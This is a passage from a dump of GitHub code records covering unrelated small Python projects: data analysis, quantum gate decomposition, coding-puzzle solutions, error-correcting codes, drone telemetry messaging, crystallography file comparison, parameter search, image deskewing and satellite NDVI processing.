(datetime.strptime(x[1][0][0],'%Y/%m/%d').isoformat().split(\"T\")[0],x[1][1]),x[1][0][1])).reduceByKey(lambda a, b: a + b)\n\nWeatherData = sc.textFile('/Users/charuarora/Downloads/babs_open_data_year_1/201402_babs_open_data/201402_weather_data.csv').map(lambda x: x.split(','))\n\nw_Header = WeatherData.first()\n\nw_data = WeatherData.filter(lambda row: row 
!=w_Header)\n\nIndexedWeatherData = w_data.map(lambda x: ((datetime.strptime(x[0], '%m/%d/%Y').isoformat().split(\"T\")[0],int(x[23])),(x[2],x[5],x[8],x[11],x[14],x[17],x[19],x[21])))\n\nNewResult = Result.join(IndexedWeatherData)\n\n\nFinal = NewResult.map(lambda x: (x[0][0],x[0][1],x[1][1][0] ,x[1][1][1],x[1][1][2],x[1][1][3],x[1][1][4],x[1][1][5],x[1][1][6],x[1][1][7] ,x[1][0]))\n\n\ndf = sqlContext.createDataFrame(Final, ['date','zipcode','temp', 'dewpoint','humidity','sealevel','visibility','windspeed','precipitation','event','count'])\ndf.coalesce(1).write.format(\"com.databricks.spark.csv\").option(\"header\", \"true\").save(\"/Users/charuarora/Documents/UTD/Spring_2017/BigData/project/weather/weather2014.csv\")\n\n","repo_name":"charuarora09/Data-Science","sub_path":"Bikeshare-Data-Analysis/query3.py","file_name":"query3.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29444424274","text":"from sympy import Matrix, log, sqrt, det # , cos, sin, exp\r\nfrom sympy.physics.quantum import TensorProduct, Dagger\r\nimport itertools\r\n\r\n\r\n# Calculating the decomposition of U = K1 * A * K2\r\n\r\n# A = Matrix([\r\n# [cos(alpha - beta) * exp(1j * gamma), 0, 0, 1j * sin(alpha - beta) * exp(1j * gamma)],\r\n# [0, cos(alpha + beta) * exp(-1j * gamma), 1j * sin(alpha + beta) * exp(-1j * gamma), 0],\r\n# [0, 1j * sin(alpha + beta) * exp(-1j * gamma), cos(alpha + beta) * exp(-1j * gamma), 0],\r\n# [1j * sin(alpha - beta) * exp(1j * gamma), 0, 0, cos(alpha - beta) * exp(1j * gamma)]]\r\n# )\r\n\r\n# Matrix Q transforms the standard basis into the magic basis.\r\nQ = Matrix([\r\n [1, 0, 0, 1j],\r\n [0, 1j, 1, 0],\r\n [0, 1j, -1, 0],\r\n [1, 0, 0, -1j]]\r\n ) / sqrt(2)\r\n\r\nQ_dag = Dagger(Q)\r\n\r\n# Pauli single-qubit operator matrices\r\nId = Matrix([ # Keyword I is reserved for imaginary numbers.\r\n [1, 0],\r\n [0, 1]]\r\n )\r\nX = Matrix([\r\n [0, 1],\r\n [1, 0]]\r\n )\r\nY = Matrix([\r\n [0, -1j,],\r\n [1j, 0]]\r\n )\r\nZ = Matrix([\r\n [1, 0],\r\n [0, -1]]\r\n )\r\n\r\nXX = TensorProduct(X, X)\r\nYY = TensorProduct(Y, Y)\r\nZZ = TensorProduct(Z, Z)\r\n\r\n\r\ndef _U_2_Umb(U: Matrix) -> Matrix:\r\n return Q_dag @ U @ Q\r\n\r\n\r\ndef _Umb_2_U(Umb: Matrix) -> Matrix:\r\n return Q @ Umb @ Q_dag\r\n\r\n\r\ndef _vectors_2_matrix(vectors: list) -> Matrix:\r\n M = vectors[0]\r\n for vec in vectors[1:]:\r\n M = M.row_join(vec)\r\n return M\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n U_test = Matrix([\r\n [1, 0, 0, 1],\r\n [0, 1, 1, 0],\r\n [0, 1, -1, 0],\r\n [1, 0, 0, -1]]\r\n ) / sqrt(2)\r\n\r\n Umb = _U_2_Umb(U_test)\r\n\r\n M = Umb.T @ Umb\r\n\r\n eigs = [(eigval, eigvec[0]) for (eigval, _, eigvec) in\r\n M.eigenvects()]\r\n\r\n for permutation in itertools.permutations(eigs):\r\n eigvals = [eig[0] for eig in permutation]\r\n eigvecs = [eig[1] for eig in permutation]\r\n O2 = _vectors_2_matrix(eigvecs).T\r\n if int(det(O2)) == 1:\r\n break\r\n\r\n l1, l2, l3, l4 = eigvals\r\n alpha = 1j / 4 * log(l1 * l2 / (l3 * l4))\r\n beta = 1j / 4 * log(l2 * l4 / (l1 * l3))\r\n gamma = 1j / 4 * log(l1 * l4 / (l2 * l3))\r\n","repo_name":"QuTech-Delft/cQASM-tools","sub_path":"Can1Can2/canDecomp_sympy.py","file_name":"canDecomp_sympy.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"4322764373","text":"'''\nA self-dividing number is a number that is divisible by every digit it contains.\n\nFor 
example, 128 is a self-dividing number because 128 % 1 == 0, 128 % 2 == 0, and 128 % 8 == 0.\nA self-dividing number is not allowed to contain the digit zero.\n\nGiven two integers left and right, return a list of all the self-dividing numbers in the range [left, right].\n\n \n\nExample 1:\n\nInput: left = 1, right = 22\nOutput: [1,2,3,4,5,6,7,8,9,11,12,15,22]\nExample 2:\n\nInput: left = 47, right = 85\nOutput: [48,55,66,77]\n \n\nConstraints:\n\n1 <= left <= right <= 104\n\n'''\nclass Solution:\n def selfDividingNumbers(self, left: int, right: int) -> List[int]:\n a=[]\n for i in range(left, right+1):\n s=str(i)\n if '0' in s:\n continue\n if sum(map(lambda b:i%int(b),s))==0:\n a.append(i)\n return a \n ","repo_name":"shreyansh-tyagi/leetcode-problem","sub_path":"self dividing numbers.py","file_name":"self dividing numbers.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"40704126740","text":"import os\nimport os.path as osp\n\nimport pandas as pd\n\ndef change_DataType(count, list_data):\n root_path = data_root_path\n for out_name in list_data:\n now_file = root_path + out_name\n checkfile = os.listdir(now_file)\n # print(checkfile)\n for inside_name in checkfile:\n now_data = now_file+'/'+inside_name\n checkdata = os.listdir(now_data)\n # print(checkdata)\n for i in range(len(checkdata)):\n if '.asc' in checkdata[i]:\n print(checkdata[i])\n name_split = checkdata[i].split('.')\n newpath = name_split[0]+\".txt\"\n # newroot = out_name + inside_name\n newroot = inside_name+\"_newFile\"\n path = \"data_wave/\"+out_name+\"/\"+newroot \n isExist = os.path.exists(path)\n \n if isExist == True:\n pass \n else:\n os.mkdir(path)\n \n print(f'checkdata : {checkdata[i]}')\n print(f'newpath : {newpath}')\n print(f'newroot : {newroot}')\n print('-'*10)\n raw_file = \"data_wave/\" + out_name +\"/\"+ inside_name+\"/\"\n file = path+\"/\"+name_split[0]+\".txt\"\n os.rename(raw_file+checkdata[i], file)\n \n #modify the file content\n file_path = file\n files = open(file_path)\n lines = files.readlines()\n \n del lines[0: 56]\n files.close()\n\n file_new = open(file_path, 'w+')\n file_new.writelines(lines)\n file_new.close()\n \n\n \n # name_split = checkdata[i].split('.')\n # print(name_split[0])\n # file_asc = name_split[0]+'.txt'` \n # pf = pd.read_csv(file_asc)\n # print(pf)\n # print(i,'-'*100)\n \n \n\n\n\ndata_root_path = 'data_wave/'\n# wavedata = data_root_path + 'data_wave'\ndatalist = os.listdir(data_root_path)\nprint(datalist)\nchange_DataType(len(datalist), datalist)\n","repo_name":"Mariiiiiio/2023-Research_Of_Soil_AI_model","sub_path":"files/changeType.py","file_name":"changeType.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30229594920","text":"# 4. 
Hacer un programa que pida al usuario que ingrese su nombre.\r\n# Si el nombre es \"Don Ramon\" o \"Doña Florinda\",\r\n# mostrar un mensaje que diga \"Es que no me tienen paciencia\".\r\n\r\nnombre = input(\"Ingrese su nombre: \")\r\n\r\ndon_ramon = \"Don Ramon\"\r\ndonia_florinda = \"Doña Florinda\"\r\npaciencia = \"Es que no me tienen paciencia\"\r\n\r\nif nombre == don_ramon or nombre == donia_florinda:\r\n print(paciencia)","repo_name":"mandrildev/ProgramacionDesdeCeroRepasoUno","sub_path":"ProgramacionDesdeCero/Clase03/Ejercicio04.py","file_name":"Ejercicio04.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37926793269","text":"from Dijkstra import dijkstra\n\nclass TestDijkstra:\n def setup_method(self):\n dic = {\n 'A': {'C': 2, 'E': 4},\n 'B': {'A': 6, 'D': 5},\n 'C': {'B': 4, 'E': 14},\n 'D': {'A': 3, 'C': 7},\n 'E': {'B': 6, 'D': 11}\n }\n\n return dic\n \n def test_dijkstra(self):\n graph = self.setup_method()\n first_var, second_var = dijkstra(graph, 'C')\n assert first_var == {'A': 10, 'B': 4, 'C': 0, 'D': 9, 'E': 14}\n assert second_var == {'B': 'C', 'E': 'C', 'A': 'B', 'D': 'B'}\n\n\ntest = TestDijkstra()\ntest.test_dijkstra()\n","repo_name":"kio7/UiT_code_examples","sub_path":"2nd year/Aicourse/Eksamen/test_Oppgave 9.py","file_name":"test_Oppgave 9.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3731252272","text":"import sys;\ninput = sys.stdin.readline;\n\nCHESSLEN = 8;\nchessBoard = [];\n\ndef countChessColor (startX, startY, startColor):\n currentColor = startColor;\n count = 0\n for i in range(CHESSLEN):\n for j in range(CHESSLEN):\n if chessBoard[startX+i][startY+j] == currentColor:\n count += 1;\n currentColor = 'B' if currentColor == 'W' else 'W';\n currentColor = 'B' if currentColor == 'W' else 'W';\n return count;\n\nn,m = map(int, input().split());\nfor _ in range(n):\n row = input().rstrip();\n chessBoard.append(row);\n\nresultArr = [];\nfor startX in range(n-CHESSLEN+1):\n for startY in range(m-CHESSLEN+1):\n resultArr.append(countChessColor(startX, startY, 'B'))\n resultArr.append(countChessColor(startX, startY, 'W'))\n\nprint(min(resultArr))","repo_name":"HamInKyou/python_codingTest_prac","sub_path":"backJoonStep/11/R_1018.py","file_name":"R_1018.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11719199207","text":"#!/usr/bin/python3\n\ndef add_elem(matrix, n, m, i, j):\n if i >= 0 and i <= n - 1 and j >= 0 and j <= m - 1:\n return matrix[i][j]\n return False\n\ndef minesweeper(matrix):\n n = len(matrix)\n m = len(matrix[0])\n counts = [[0 for i in range(m)] for j in range(n)]\n for i in range(n):\n for j in range(m):\n count = 0\n for p in range(i - 1, i + 2):\n for q in range(j - 1, j + 2):\n count += add_elem(matrix, n, m, p, q)\n counts[i][j] = count - matrix[i][j]\n return counts\n\n","repo_name":"lorosanu/online-coding","sub_path":"CodeFights/arcade/intro/24/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10077446544","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def rotateRight(self, 
head, k):\n        \"\"\"\n        :type head: ListNode\n        :type k: int\n        :rtype: ListNode\n        \"\"\"\n        if not head:\n            return None\n        \n        # calculate actual shift\n        length = self.getLength(head)\n        shift = k % length\n        if shift == 0:\n            return head\n        \n        # pick off the shifted numbers, stick them to the front\n        cur = head\n        for i in range(length - shift - 1): # this is actually shifting to the left, just changed the range\n            cur = cur.next\n        \n        newHead = cur.next\n        cur.next = None\n        \n        cur = newHead\n        while cur.next:\n            cur = cur.next\n        \n        cur.next = head\n        \n        return newHead\n    \n    \n    def getLength(self, head):\n        length = 0\n        while head:\n            length += 1\n            head = head.next\n        return length","repo_name":"iechevarria/leetcode","sub_path":"061rotateList.py","file_name":"061rotateList.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}{"seq_id":"35785157839","text":"import numpy as np\nimport itertools\n\nk1 = 4\nn1 = 7\ng1 = np.array([1, 0, 1, 1])#порождающий многочлен\n\nk2 = 9\nn2 = 15\ng2 = np.array([1, 0, 0, 1, 1, 1, 1])#порождающий многочлен\n\ndef Encode1(input):\n    c = np.array([0, 0, 0, 0, 0, 0, 0])\n    for i in range(0, k1):\n        if input[i] == 1:\n            c[i:i + 4] ^= g1\n    return c\n\ndef Remainder1(input):\n    r = input.copy()\n    for i in range(n1 - 1, n1 - k1 - 1, -1):\n        if r[i] == 1:\n            r[i - (n1 - k1): i + 1] ^= g1\n    return r\n\ndef WH(a): # расчёт веса Хэмминга\n    wt = 0\n    for i in range(int(len(a))):\n        if (a[i]):\n            wt += 1\n    return wt\n\ndef Decode1(w):\n    s = Remainder1(w)\n    for i in range(n1):\n        s1 = np.roll(s, i)\n        ss =Remainder1(s1)\n        if WH(ss)<=count_er:\n            x = np.roll(ss, n1 - i)\n            return x^w\n\ndef Encode2(input):\n    c2 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n    for j in range(0, k2):\n        if input[j] == 1:\n            c2[j:j + 7] ^= g2\n    return c2\ndef Remainder2(input):\n    r = input.copy()\n    for i in range(n2 - 1, n2 - k2 - 1, -1):\n        if r[i] == 1:\n            r[i - (n2 - k2): i + 1] ^= g2\n    return r\ndef Decode2(w):\n    s = Remainder2(w)\n    for i in range(n2):\n        s1 = np.roll(s, i)\n        ss = Remainder2(s1)\n        for e in range(len(E)):\n            if np.array_equal(E[e], ss):\n                x = np.roll(ss, n2 - i)\n                return x^w\n\n\nprint(\"ЧАСТЬ 1\")\n#входящая посл-ть\na = [1, 0, 0, 1]\nprint(a)\nA = Encode1(a)\nprint(\"Закодированное сообщение\", A)\nencod = A.copy()\n#кол-во ошибок от 1 до 3\nwhile True:\n    count_er = int(input(\"Количество ошибок?: \"))\n    if not 1 <= (count_er) <= 3:\n        print(\"Попробуйте снова\")\n    else:\n        print(count_er)\n        break\nmas_er2=[]\nz=0\n#последовательно вносим ошибки\nwhile z < count_er:\n    i = int(input(\"В какой бит внести ошибку?: \"))\n    if not 0 <= (i) < n1: #не выходим за границы сообщения\n        print(\"Число не в диапазоне, попробуйте снова\")\n        i = int(input(\"В какой бит внести ошибку?: \"))\n    elif i in mas_er2:\n        print(\"Число ранее было задано,попробуйте снова\")#Не меняем один и тот же бит несколько раз\n        i = int(input(\"В какой бит внести ошибку?: \"))\n    else:\n        print(\"i =\", i)\n        mas_er2.append(i)#запоминаем номер бита для проверки\n        encod[i] = not encod[i]#Меняем бит\n        print(\"Слово с ошибкой в бите\",i,\":\", encod)\n        z+=1\nde = Decode1(encod)\nprint(de)\n\nprint(\"ЧАСТЬ 2\")\nE = []\ne1 = [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ne2 = [1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ne3 = [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\ne4 = [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nE.append(e1)\nE.append(e2)\nE.append(e3)\nE.append(e4)\nfor i in range(1, 15):\n    e1 = np.roll(e1, 1)\n    e2 = np.roll(e2, 1)\n    e3 = 
np.roll(e3, 1)\n    e4 = np.roll(e4, 1)\n    E.append(e1)\n    E.append(e2)\n    E.append(e3)\n    E.append(e4)\n\nb = [1, 0, 0, 1, 0, 0, 0, 1, 1]\nprint(b)\nB = Encode2(b)\nprint(\"Закодированное сообщение\", B)\nencod1 = B.copy()\n#кол-во ошибок от 1 до 4\nwhile True:\n    count_er1 = int(input(\"Количество ошибок?: \"))\n    if not 1 <= (count_er1) <= 4:\n        print(\"Попробуйте снова\")\n    else:\n        print(count_er1)\n        break\nmas_er3=[]\nz1=0\n#последовательно вносим ошибки\nwhile z1 < count_er1:\n    i = int(input(\"В какой бит внести ошибку?: \"))\n    if not 0 <= (i) < n2: #не выходим за границы сообщения\n        print(\"Число не в диапазоне, попробуйте снова\")\n        i = int(input(\"В какой бит внести ошибку?: \"))\n    elif i in mas_er3:\n        print(\"Число ранее было задано,попробуйте снова\")#Не меняем один и тот же бит несколько раз\n        i = int(input(\"В какой бит внести ошибку?: \"))\n    else:\n        print(\"i =\", i)\n        mas_er3.append(i)#запоминаем номер бита для проверки\n        encod1[i] = not encod1[i]#Меняем бит\n        print(\"Слово с ошибкой в бите\",i,\":\", encod1)\n        z1+=1\nde1 = Decode2(encod1)\nprint(de1)\n","repo_name":"FuryCroissant/CodingTheory6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}{"seq_id":"8501797731","text":"\"\"\"\nThis script will:\n > Connect to the pixhawk\n > Send a custom VIDEO_MONITOR message\n > Wait for an acknowledgment before sending another message\n > Retransmit if no acknowledgment has been received\n\"\"\"\nfrom pymavlink import mavutil\nimport time\n\n# Set the dialect to receive the correct messages\nmavutil.set_dialect(\"video_monitor\")\n\n# Connect to the serial port of the pixhawk\npx4 = mavutil.mavlink_connection(\"/dev/ttyACM0\", baud=921600)\n\n# Waiting for a heartbeat\npx4.wait_heartbeat()\n\nprint(\"Heartbeat from system (system %u component %u)\" %(px4.target_system, px4.target_component))\n\ncounter = 0\nretransmit = False\nwhile True:\n#\tif not retransmit:\n    # Send a custom message\n\tpx4.mav.video_monitor_send(\n\ttimestamp = int(time.time()*1e6),\n\tinfo = b'Salut!',\n\tlat = counter,\n\tlon = 231234567,\n\tno_people = 6,\n\tconfidence = 0.357)\n\tprint(\"The custom message with the number %u was sent!\" %(counter))\n\tretransmit = False\n    # Wait for acknowledgment before sending new message\n\twhile True:\n        # Wait for acknowledgment for a maximum of 3 seconds\n\t\tmsg = px4.recv_match(type='VIDEO_MONITOR', blocking=True, timeout=3.0)\n\t\ttry:\n            # If acknowledgment has been received\n\t\t\tif msg.confidence == 1 and msg.lat == counter:\n\t\t\t\tbreak\n\t\texcept:\n            # No acknowledgment received, going to retransmit message\n\t\t\tprint(\"No response, retransmission!!\")\n\t\t\tretransmit = True\n\t\t\tbreak\n\n\tcounter += 1\n\ttime.sleep(4.0)\n\n","repo_name":"DTT-DennisM/PX4","sub_path":"COMPANION_COMPUTER/mavlink/sendCustomMsg.py","file_name":"sendCustomMsg.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}{"seq_id":"25159001480","text":"\"\"\"\nGive two mtz files (mtz_1 and mtz_2).\nReflections only in mtz_1 will be written as only_in_1.mtz. 
only_in_2.mtz will be written in the same way.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport mmtbx.utils\nimport iotbx.phil\nimport iotbx.reflection_file_utils\nimport iotbx.mtz\nfrom cctbx import miller\n\nmaster_params_str = \"\"\"\\\nhklin_1 = None\n .type=str\n .input_size = 160\n .short_caption = file name of mtz 1\nhklin_2 = None\n .type=str\n .input_size = 160\n .short_caption = file name of mtz 2\nlabels_1 = None\n .type=str\n .input_size = 160\n .short_caption = Data labels for mtz 1\nlabels_2 = None\n .type=str\n .input_size = 160\n .short_caption = Data labels for mtz 2\n\"\"\"\n\ndef get_data(mtzin, labels):\n mtzobj = iotbx.mtz.object(file_name=mtzin)\n selected = [x for x in mtzobj.as_miller_arrays() if x.info().label_string() == labels]\n\n if len(selected) < 1:\n print(mtzin, \"does not have\", labels)\n print(\" Possible labels:\", [x.info().label_string() for x in mtzobj.as_miller_arrays()])\n\n return selected[0]\n# get_data()\n\nif __name__ == \"__main__\":\n import sys\n\n parsed = iotbx.phil.parse(master_params_str, process_includes=True)\n\n\n processed_args = mmtbx.utils.process_command_line_args(args = sys.argv[1:],\n log = sys.stdout,\n master_params = parsed)\n\n working_phil = processed_args.params\n params = working_phil.extract()\n\n if params.hklin_1 is None and params.hklin_2 is None:\n if len(processed_args.reflection_file_names) != 2:\n print(\"Exactly two mtz files must be given.\")\n sys.exit(1)\n params.hklin_1, params.hklin_2 = processed_args.reflection_file_names\n\n working_phil = parsed.format(python_object=params)\n print(\"Parameters to compute maps:\")\n working_phil.show(out = sys.stdout, prefix=\" \")\n\n\n data_1 = get_data(params.hklin_1, params.labels_1)\n data_2 = get_data(params.hklin_2, params.labels_2)\n\n matches = miller.match_indices(data_1.indices(), data_2.indices())\n\n only_1 = data_1.select(matches.singles(0))\n only_2 = data_2.select(matches.singles(1))\n\n only_1.as_mtz_dataset(column_root_label=params.labels_1.split(\",\")[0]).mtz_object().write(\"only_in_1.mtz\")\n only_2.as_mtz_dataset(column_root_label=params.labels_2.split(\",\")[0]).mtz_object().write(\"only_in_2.mtz\")\n","repo_name":"keitaroyam/yamtbx","sub_path":"cctbx_progs/diff_hkls.py","file_name":"diff_hkls.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"67"} +{"seq_id":"40224300683","text":"import argparse\nimport numpy as np\nimport cv2\n\n\nclass textScrewCorrection:\n def __init__(self, image):\n self.image = image\n self.height = image.shape[0]\n self.width = image.shape[1]\n\n def __call__(self, *args, **kwargs):\n gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n gray = cv2.bitwise_not(gray)\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(thresh > 0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n center = (self.width // 2, self.height // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(self.image, M, (self.width, self.height), flags=cv2.INTER_CUBIC,\n borderMode=cv2.BORDER_REPLICATE)\n cv2.putText(rotated, \"Angle: {:.2f} degrees\".format(angle), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\n (0, 0, 255), 2)\n print(\"[INFO] angle: {:.3f}\".format(angle))\n cv2.imshow(\"Input\", self.image)\n cv2.imshow(\"Rotated\", rotated)\n cv2.waitKey(0)\n 
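        # waitKey(0) above blocks until a key is pressed; the call below then closes
        # the "Input" and "Rotated" preview windows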
cv2.destroyAllWindows()\n","repo_name":"Syun1208/eKYC-ID-Card-Detection","sub_path":"deploy/text_screw_correction.py","file_name":"text_screw_correction.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"72149972692","text":"# param_bounds = {\n# 'n_estimators': (20, 5, 1, 1, 50),\n# 'min_samples_split': (14, 12, 1, 1, 32),\n# 'max_features': (0.2, 0.15, 0.05, 0.05, 1)\n# }\nimport copy\nimport random\n\n\nclass ParamSearch(object):\n def __init__(self, model, scoring, seed=None):\n self.model = copy.copy(model)\n self.scoring = scoring\n if seed is None:\n self.seed = random.randint(1, 2**32 - 2)\n else:\n self.seed = seed\n self.all_scores = {}\n self.best_score = -1000\n self.best_params = 0\n self.new_scores_count = 1\n self.best_score_path = []\n self.best_param_path = []\n\n def search(self, param_bounds, verbose=False):\n step_sizes = []\n param_vals = []\n min_step_sizes = []\n lower_lims = []\n upper_lims = []\n param_names = param_bounds.keys()\n param_names.sort()\n self.param_names = param_names\n for p in param_names:\n p_bounds = param_bounds[p]\n if type(p_bounds) == dict:\n llim = p_bounds['lims'][0]\n ulim = p_bounds['lims'][1]\n if 'step_size' in p_bounds:\n step_size = p_bounds['step_size']\n else:\n step_size = (ulim - llim) / 2\n if 'min_step_size' in p_bounds:\n min_step_size = p_bounds['min_step_size']\n else:\n min_step_size = step_size\n if 'start' in p_bounds:\n start = p_bounds['start']\n else:\n start = (ulim + llim) / 2\n else:\n llim = p_bounds[0]\n ulim = p_bounds[1]\n step_size = (ulim - llim) / 2\n if len(p_bounds) > 2:\n min_step_size = p_bounds[2]\n else:\n min_step_size = step_size\n if len(p_bounds) > 3:\n start = p_bounds[3]\n else:\n start = (ulim + llim) / 2\n param_vals.append(start)\n step_sizes.append(step_size)\n lower_lims.append(llim)\n upper_lims.append(ulim)\n min_step_sizes.append(min_step_size)\n self.iter = 0\n if verbose:\n print(param_names)\n print(param_vals)\n print('\\tstep_size: %s' % step_sizes)\n while self.iter < 30:\n param_grid = {}\n for i in range(len(param_names)):\n p = param_names[i]\n if param_vals[i] < lower_lims[i]:\n param_vals[i] = lower_lims[i]\n if param_vals[i] > upper_lims[i]:\n param_vals[i] = upper_lims[i]\n if param_vals[i] - step_sizes[i] < lower_lims[i]:\n param_grid[p] = [lower_lims[i], param_vals[i], param_vals[i] + step_sizes[i]]\n elif param_vals[i] + step_sizes[i] > upper_lims[i]:\n param_grid[p] = [param_vals[i] - step_sizes[i], param_vals[i], upper_lims[i]]\n else:\n param_grid[p] = [\n param_vals[i] - step_sizes[i], param_vals[i], param_vals[i] + step_sizes[i]\n ]\n self.new_scores_count = 0\n res = self.process(param_grid, param_names=param_names)\n if verbose:\n print(param_names)\n print(param_vals)\n print('\\tstep_sizes: %s' % step_sizes)\n print('\\tnew_scores_count: %s' % self.new_scores_count)\n print('\\tbest_score: %s' % self.best_score)\n self.best_score_path.append(self.best_score)\n self.best_param_path.append(self.best_params)\n if self.new_scores_count == 0:\n # cut step_sizes in half\n step_sizes_old = step_sizes\n step_sizes = []\n for i in range(len(param_names)):\n if type(step_sizes_old[i]) == str:\n continue\n if type(step_sizes_old[i]) == int:\n new_step = step_sizes_old[i] / 2\n if type(step_sizes_old[i]) == float:\n new_step = step_sizes_old[i] / 2\n if new_step < min_step_sizes[i]:\n new_step = step_sizes_old[i]\n step_sizes.append(new_step)\n if step_sizes == 
step_sizes_old:\n break\n param_vals = self.best_params\n self.iter += 1\n res['param_names'] = param_names\n return res\n\n def get_score(self, params, param_names):\n if params in self.all_scores:\n return self.all_scores[params]\n else:\n self.new_scores_count += 1\n params_dict = dict(zip(param_names, params))\n self.model.clf.set_params(**params_dict)\n # select the correct proba\n proba = True\n if type(self.scoring) == str and self.scoring in ('accuracy'):\n proba = False\n if type(self.scoring) == dict:\n if self.scoring.values()[0].__name__ in ('accuracy_score'):\n proba = False\n eval_results = self.model.evaluate(scoring=self.scoring, proba=proba, seed=self.seed)\n score_type = eval_results.scores_.keys()[0]\n if score_type in ['brier']:\n score = -eval_results.scores_[score_type]['mean']\n else:\n score = eval_results.scores_[score_type]['mean']\n self.all_scores[params] = score\n return score\n\n def process(self, param_grid, param_values=(), param_names=None):\n param_grid = param_grid.copy()\n keys = param_grid.keys()\n keys.sort()\n k = keys[0]\n param_v = param_grid.pop(k)\n if len(param_grid) > 0:\n # process next batch\n params = []\n values = []\n for px in param_v:\n px2 = param_values + (px,)\n results = self.process(param_grid, param_values=px2, param_names=param_names)\n params.append(results['params'])\n values.append(results['values'])\n return {'params': params, 'values': values}\n else:\n params = []\n values = []\n for px in param_v:\n p_cell = param_values + (px,)\n params.append(p_cell)\n score = self.get_score(p_cell, param_names)\n if score > self.best_score:\n self.best_score = score\n self.best_params = p_cell\n values.append(score)\n return {'params': params, 'values': values}\n","repo_name":"nextbigsoundinc/eightball","sub_path":"eightball/param_optimization.py","file_name":"param_optimization.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"11680285591","text":"## functional code to process LANDSAT DATA into change pixels from 1995-2015 in wake county\n\nimport fiona\nimport rasterio\nfrom rasterio.mask import mask\nfrom rasterio.warp import calculate_default_transform, reproject, Resampling\nimport numpy\nimport os\nimport tarfile\nimport re\nimport glob\nimport errno\n\n# Allow division by zero\nnumpy.seterr(divide='ignore', invalid='ignore')\ndst_CRS = 'EPSG:2264'\n\n\ndef build_folders(directory):\n \"\"\"\n simple function to build directory structure for code\n :param directory: string path to data folder\n :return: list of directories\n \"\"\"\n output_NDVI = os.path.join(directory, 'NDVI')\n max_NDVI = os.path.join(output_NDVI, 'MAX_NDVI')\n change = os.path.join(directory, 'CHANGE')\n folders = [output_NDVI, max_NDVI, change]\n for folder in folders:\n if not os.path.exists(folder):\n try:\n os.mkdir(folder)\n except OSError as oserr:\n if oserr.errno != errno.EEXIST:\n raise\n\n return folders\n\n\ndef reproj_raster(raster):\n # unused function, could be valuable if a different projection is prefered,\n # currently the data remain in the CRS downloaded from Earth Explorer\n \"\"\"\n function to reporject a raster to state plane feet\n :param raster: raster to be projected\n :return: projected raster file path\n \"\"\"\n path, file = os.path.split(raster)\n out_raster = os.path.join(path, file[:-4] + '.NC_SPF.tif')\n with rasterio.open(raster) as src:\n transform, width, height = calculate_default_transform(\n src.crs, dst_CRS, src.width, 
src.height, *src.bounds)\n        kwargs = src.meta.copy()\n        kwargs.update(\n            crs=dst_CRS,\n            transform=transform,\n            width=width,\n            height=height)\n        with rasterio.open(out_raster, 'w', **kwargs) as dst:\n            for i in range(1, src.count + 1):\n                reproject(\n                    source=rasterio.band(src, i),\n                    destination=rasterio.band(dst, i),\n                    src_transform=src.transform,\n                    src_crs=src.crs,\n                    dst_transform=transform,\n                    dst_crs=dst_CRS,\n                    resampling=Resampling.nearest)\n    return out_raster\n\n\ndef process_VI(ref, abs, meta):\n    \"\"\"\n    simple function to process the NIR and RED bands to NDVI, generalized enough to process other band\n    combinations as well\n    :param ref: reflectance band\n    :param abs: absorption band\n    :param meta: metadata about incoming rasters\n    :return: vi array and updated metadata about created raster\n    \"\"\"\n    # Calculate VI\n    ndvi = (ref.astype(float) - abs.astype(float)) / (ref + abs)\n    